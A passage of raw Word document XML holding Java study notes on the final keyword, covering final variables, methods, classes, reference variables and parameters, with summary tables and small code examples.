          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable and heavily used</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Preventing subclassing avoids unpredictable behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466392B2"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Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C79C97A"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xml:space="preserve"> of a final class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37330631"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not extend (subclass)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a final class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B815A78"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final class </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can have final or non-final methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C78912C"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class can be final, a method can be final, and a variable can also be final — but they have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different meanings</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33069BD0" w14:textId="199DB5A7" w:rsidR="00126041" w:rsidRPr="00CE4B95" w:rsidRDefault="00126041" w:rsidP="0006045C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w14:paraId="4CC6D49A" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F945321"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126041" w:rsidRPr="00CE4B95" w14:paraId="3DE14AF4" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D7062B"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variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E145A8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Value cannot be changed after initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="629F7B12" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07054AAF"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method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="710EDF7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ethod cannot be overridden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126041" w:rsidRPr="00CE4B95" w14:paraId="1CB83B04" w14:textId="77777777" w:rsidTr="00126041">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B414D37"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class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="333BEB22"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Class cannot be extended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07FA569A" w14:textId="4C61BCC6" w:rsidR="00661E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5C46BADD" w14:textId="77777777" w:rsidR="003507F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003507F3" w:rsidP="003507F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc197867229"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where can we use the final keyword?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2AB01E3C" w14:textId="76B5F84B" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C8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final keyword in Java is used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>restrict modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it can be applied to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>variables, methods, and classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184A8CE" w14:textId="606228F2"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Let’s break it down</w:t>
      </w:r>
      <w:r w:rsidR="007609FC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194CCBD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final Variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E662F6B" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prevents reassignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — once initializ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2135D532"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868B381" w14:textId="77777777"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A035162" w14:textId="5AE51219"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// x = 20;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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718A91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81C23FC"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Constants (static final)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D56B5"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Ensuring values remain unchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011447A2"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final Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06CFB1" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>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method from being </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A925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4B378D2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2EAFE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1E836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rent show"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A52FB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83346" w14:textId="792B8B6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093A88C"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B5D9D7"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void show() {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override final method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE6361" w14:textId="7D106625"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p>
    <w:p w14:paraId="6EFDCE9D"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19EC5F57" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Security or utility methods that shouldn't be altered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C123B4A"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final Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088E55D" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>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class from being </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subclassed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., inherited).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3D70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C465E9E"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7CB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pe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C422A3"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oar"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371919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EC5966"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E99A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20D1A" w14:textId="0A060F5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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// class Dog extends Animal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inherit from final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184FF1D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DFE182E" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Immutable or security-sensitive classes (like java.lang.String)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F26A57"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final with Reference Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32174E67" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>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t reassign</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the reference, but the object it points to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can still be modified</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DDD7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8F55CAB"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Allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6011D2C6" w14:textId="15C990F6"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">// names = new ArrayList&lt;&gt;();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Not allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686CFA0D" w14:textId="39C7EBAF" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33400336" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95" w:rsidRDefault="00F00606" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C1BE08" w14:textId="70CAE855"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final with Method Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA415AB" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Makes the parameter </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F19788"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F1BA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num = 5;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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4374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647D716E" w14:textId="09B46F64"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5120013"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6. final and static together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E0A7A"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 xml:space="preserve">Used to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC769F" w14:textId="260BC52B"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14159</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8ECB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CE4B95" w14:paraId="27D931EE" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F118D2"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Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61522819"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Effect of final</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="5E525E3C" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="525D520C"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riable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6121875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t be changed after initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="48C9625B" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18F61C22"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A21341"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overridden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="01B9D7FB" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70CF0A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lass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51CB5CF4"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extended (no subclass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="5BB5DF0F" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="519F7BC5"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E5C0843"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 can't be reassigned (but object can change)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="478D85A3" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B3B31DE"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Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58F4EF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not be modified inside method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="09CB62FA" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B4C9330"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static final</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B74B2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reates constants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47B90C88" w14:textId="6195291C"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CE4B95" w:rsidRDefault="000F5ACC" w:rsidP="000F5ACC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc197867230"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen if I create the final class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="07F18829" w14:textId="2AA67A87" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="00A6391B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A final class in Java is a class that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be extended or inherited</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531759D" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="00DB38FF">
      <w:pPr>
        <w:ind w:firstLine="360"/>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happens when you create a final class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579D1B1"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1. You can use it as-is</w:t>
      </w:r>
    </w:p>
